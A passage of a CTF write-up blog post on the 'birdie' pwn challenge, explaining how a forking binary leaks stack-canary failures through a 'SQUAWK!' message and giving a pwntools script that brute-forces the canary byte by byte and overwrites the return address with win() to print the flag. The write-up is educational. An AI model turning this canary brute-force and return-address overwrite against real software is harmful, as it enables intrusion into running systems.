</span></span><span class=line><span class=cl>  <span class=nf>puts</span><span class=p>(</span><span class=s>&#34;SQUAWK!&#34;</span><span class=p>);</span>                          <span class=c1>// SQUAWK!
</span></span></span></code></pre></div><p>I&rsquo;m not too sure what <code>waitpid()</code> means but let&rsquo;s have a look at it in man page.</p><blockquote><pre><code>    waitpid(-1, &amp;wstatus, 0);
</code></pre><p>The waitpid() system call suspends execution of the calling thread until a child specified by pid argument has changed state. By default, waitpid() waits only for terminated children, but this behavior is modifiable via the options argument, as described below.</p><p>If wstatus is not NULL, wait() and waitpid() store status information in the int to which it points. This integer can be inspected with the following macros (which take the integer itself as an argument, not a pointer to it, as is done in wait() and waitpid()!):</p></blockquote><p>Basically, <code>&amp;stat_loc</code> in our case returns the status of the forked program. I&rsquo;m not sure of the values as I am too lazy to open up my eglibc source to look at the <code>#define</code>. If you know where I can find the integer values for each <code>&amp;wstatus</code> signal, let me know!</p><p>But with some thinking, we can guess that it <strong>SQUAWK!</strong> because it hits a canary and the fork terminates. This means that if we can replace the canary byte by byte, it will not print SQUAWK!</p><p>Also since we get an unlimited size of input, we can easily brute force our canary. We send a byte from the whole byte range <code>0xff</code> until we do not get <strong>SQUAWK</strong>. And then repeat it for all 8 bytes of the canary including the distinctive null byte of a canary.</p><br><h2 id=exploitation>Exploitation!</h2><hr><p>Now, we can put together all our pieces to exploit the program. As soon as we can find our canary, we can easily overwrite the return address with <code>win()</code> and get the flag.</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-py data-lang=py><span class=line><span class=cl><span class=kn>from</span> <span class=nn>pwn</span> <span class=kn>import</span> <span class=o>*</span>
</span></span><span class=line><span class=cl><span class=k>with</span> <span class=n>context</span><span class=o>.</span><span class=n>quiet</span><span class=p>:</span>
</span></span><span class=line><span class=cl>    <span class=n>context</span><span class=o>.</span><span class=n>binary</span> <span class=o>=</span> <span class=n>elf</span> <span class=o>=</span> <span class=n>ELF</span><span class=p>(</span><span class=s1>&#39;birdie&#39;</span><span class=p>)</span>
</span></span><span class=line><span class=cl>    <span class=c1>#p = remote(&#39;140.238.222.141&#39;, 42000)</span>
</span></span><span class=line><span class=cl>    <span class=n>p</span> <span class=o>=</span> <span class=n>process</span><span class=p>(</span><span class=s1>&#39;./birdie&#39;</span><span class=p>)</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>payload</span> <span class=o>=</span> <span class=n>cyclic</span><span class=p>(</span><span class=mi>40</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=n>canary</span> <span class=o>=</span> <span class=sa>b</span><span class=s1>&#39;&#39;</span>
</span></span><span class=line><span class=cl><span class=nb>print</span><span class=p>(</span><span class=s2>&#34;&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=n>splash</span><span class=p>()</span>
</span></span><span class=line><span class=cl><span class=nb>print</span><span class=p>(</span><span class=s2>&#34;&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=c1>#: STAGE1</span>
</span></span><span class=line><span class=cl><span class=k>with</span> <span class=n>log</span><span class=o>.</span><span class=n>progress</span><span class=p>(</span><span class=s2>&#34;brute forcing canary&#34;</span><span class=p>)</span> <span class=k>as</span> <span class=n>pro</span><span class=p>:</span>
</span></span><span class=line><span class=cl>    <span class=k>while</span> <span class=kc>True</span><span class=p>:</span>
</span></span><span class=line><span class=cl>        <span class=k>for</span> <span class=n>i</span> <span class=ow>in</span> <span class=p>[</span><span class=n>i</span><span class=o>.</span><span class=n>to_bytes</span><span class=p>(</span><span class=mi>1</span><span class=p>,</span> <span class=s1>&#39;big&#39;</span><span class=p>)</span> <span class=k>for</span> <span class=n>i</span> <span class=ow>in</span> <span class=nb>range</span><span class=p>(</span><span class=mh>0xff</span><span class=p>)]:</span>
</span></span><span class=line><span class=cl>            <span class=k>if</span> <span class=n>i</span> <span class=o>==</span> <span class=sa>b</span><span class=s1>&#39;</span><span class=se>\n</span><span class=s1>&#39;</span><span class=p>:</span> <span class=k>continue</span>
</span></span><span class=line><span class=cl>            <span class=n>p</span><span class=o>.</span><span class=n>sendline</span><span class=p>(</span><span class=n>payload</span> <span class=o>+</span> <span class=n>canary</span> <span class=o>+</span> <span class=n>i</span><span class=p>)</span>
</span></span><span class=line><span class=cl>            <span class=n>p</span><span class=o>.</span><span class=n>recvuntil</span><span class=p>(</span><span class=sa>b</span><span class=s1>&#39;WRONG!</span><span class=se>\n</span><span class=s1>&#39;</span><span class=p>)</span>
</span></span><span class=line><span class=cl>            <span class=n>receive</span> <span class=o>=</span> <span class=n>p</span><span class=o>.</span><span class=n>recvuntil</span><span class=p>(</span><span class=sa>b</span><span class=s1>&#39;Please enter the password: &#39;</span><span class=p>)</span>
</span></span><span class=line><span class=cl>            <span class=n>pro</span><span class=o>.</span><span class=n>status</span><span class=p>(</span><span class=sa>f</span><span class=s2>&#34; </span><span class=si>{</span><span class=nb>len</span><span class=p>(</span><span class=n>canary</span><span class=p>)</span><span class=si>}</span><span class=s2>/8 - </span><span class=si>{</span><span class=n>canary</span> <span class=o>+</span> <span class=n>i</span><span class=si>}</span><span class=s2>&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl>            <span class=k>if</span> <span class=sa>b</span><span class=s1>&#39;SQUAWK&#39;</span> <span class=ow>in</span> <span class=n>receive</span><span class=p>:</span>
</span></span><span class=line><span class=cl>                <span class=k>pass</span>
</span></span><span class=line><span class=cl>            <span class=k>else</span><span class=p>:</span>
</span></span><span class=line><span class=cl>                <span class=n>canary</span> <span class=o>+=</span> <span class=n>i</span>
</span></span><span class=line><span class=cl>                <span class=k>break</span>
</span></span><span class=line><span class=cl>        <span class=k>if</span> <span class=nb>len</span><span class=p>(</span><span class=n>canary</span><span class=p>)</span><span class=o>==</span><span class=mi>8</span><span class=p>:</span>
</span></span><span class=line><span class=cl>            <span class=k>break</span>
</span></span><span class=line><span class=cl>    <span class=n>log</span><span class=o>.</span><span class=n>success</span><span class=p>(</span><span class=sa>f</span><span class=s1>&#39;Canary is </span><span class=si>{</span><span class=n>canary</span><span class=si>}</span><span class=s1> of length </span><span class=si>{</span><span class=nb>len</span><span class=p>(</span><span class=n>canary</span><span class=p>)</span><span class=si>}</span><span class=s1>&#39;</span><span class=p>)</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=c1>#: STAGE2</span>
</span></span><span class=line><span class=cl><span class=n>p</span><span class=o>.</span><span class=n>sendline</span><span class=p>(</span><span class=n>flat</span><span class=p>({</span> <span class=mi>40</span><span class=p>:</span><span class=n>canary</span><span class=p>,</span> <span class=mi>56</span><span class=p>:</span> <span class=n>p64</span><span class=p>(</span><span class=n>elf</span><span class=o>.</span><span class=n>sym</span><span class=o>.</span><span class=n>win</span><span class=p>)</span> <span class=p>}))</span>
</span></span><span class=line><span class=cl><span class=n>p</span><span class=o>.</span><span class=n>recvline</span><span class=p>()</span>
</span></span><span class=line><span class=cl><span class=n>log</span><span class=o>.</span><span class=n>success</span><span class=p>(</span><span class=sa>f</span><span class=s1>&#39;flag is </span><span class=si>{</span><span class=n>p</span><span class=o>.</span><span class=n>recvline</span><span class=p>()</span><span class=o>.</span><span class=n>strip</span><span class=p>()</span><span class=si>}</span><span class=s1>&#39;</span><span class=p>)</span>
</span></span></code></pre></div><p>Let&rsquo;s watch this in action!</p><script id=asciicast-kAmjXGbTycEhAap6tOO7NZFLl src=https://asciinema.org/a/kAmjXGbTycEhAap6tOO7NZFLl.js async></script><pre tabindex=0><code>ictf{d0nt_$m@sh_m3_1ll_s1ng_l1k3_@_can@ry!}
</code></pre></div></article><hr style=margin-top:40px;margin-bottom:40px><div id=disqus_thread></div><script>window.disqus_config=function(){},function(){if(["localhost","127.0.0.1"].indexOf(window.location.hostname)!=-1){document.getElementById("disqus_thread").innerHTML="Disqus comments not available by default when the website is previewed locally.";return}var t=document,e=t.createElement("script");e.async=!0,e.src="//caprinux.disqus.com/embed.js",e.setAttribute("data-timestamp",+new Date),(t.head||t.body).appendChild(e)}()</script><noscript>Please enable JavaScript to view the <a href=https://disqus.com/?ref_noscript>comments powered by Disqus.</a></noscript><a href=https://disqus.com class=dsq-brlink>comments powered by <span class=logo-disqus>Disqus</span></a></main></div><footer class=footer><span class=footer_item></span>&nbsp;<div class=footer_social-icons><a href=https://github.com/caprinux target=_blank rel="noopener noreferrer me" title=Github><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentcolor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path d="M9 19c-5 1.5-5-2.5-7-3m14 6v-3.87a3.37 3.37.0 00-.94-2.61c3.14-.35 6.44-1.54 6.44-7A5.44 5.44.0 0020 4.77 5.07 5.07.0 0019.91 1S18.73.65 16 2.48a13.38 13.38.0 00-7 0C6.27.65 5.09 1 5.09 1A5.07 5.07.0 005 4.77 5.44 5.44.0 003.5 8.55c0 5.42 3.3 6.61 6.44 7A3.37 3.37.0 009 18.13V22"/></svg></a><a href=https://x.com/elma_ios target=_blank rel="noopener noreferrer me" title=Twitter><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentcolor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path d="M23 3a10.9 10.9.0 01-3.14 1.53 4.48 4.48.0 00-7.86 3v1A10.66 10.66.0 013 4s-4 9 5 13a11.64 11.64.0 01-7 2c9 5 20 0 20-11.5a4.5 4.5.0 00-.08-.83A7.72 7.72.0 0023 3z"/></svg></a><a href=index.xml target=_blank rel="noopener noreferrer me" title=Rss><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentcolor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path d="M4 11a9 9 0 019 9"/><path d="M4 4a16 16 0 0116 16"/><circle cx="5" cy="19" r="1"/></svg></a></div><small class=footer_copyright>© 2023 elma.
Powered by <a href=https://github.com/hugo-sid/hugo-blog-awesome target=_blank rel=noopener>Hugo blog awesome</a>.</small></footer><a href=# title="Go to top" id=totop><svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" fill="currentcolor" stroke="currentcolor" viewBox="0 96 960 960"><path d="M283 704.739 234.261 656 480 410.261 725.739 656 677 704.739l-197-197-197 197z"/></svg></a><script src=https://blog.caprinux.com/js/main.min.35f435a5d8eac613c52daa28d8af544a4512337d3e95236e4a4978417b8dcb2f.js integrity="sha256-NfQ1pdjqxhPFLaoo2K9USkUSM30+lSNuSkl4QXuNyy8="></script></body></html>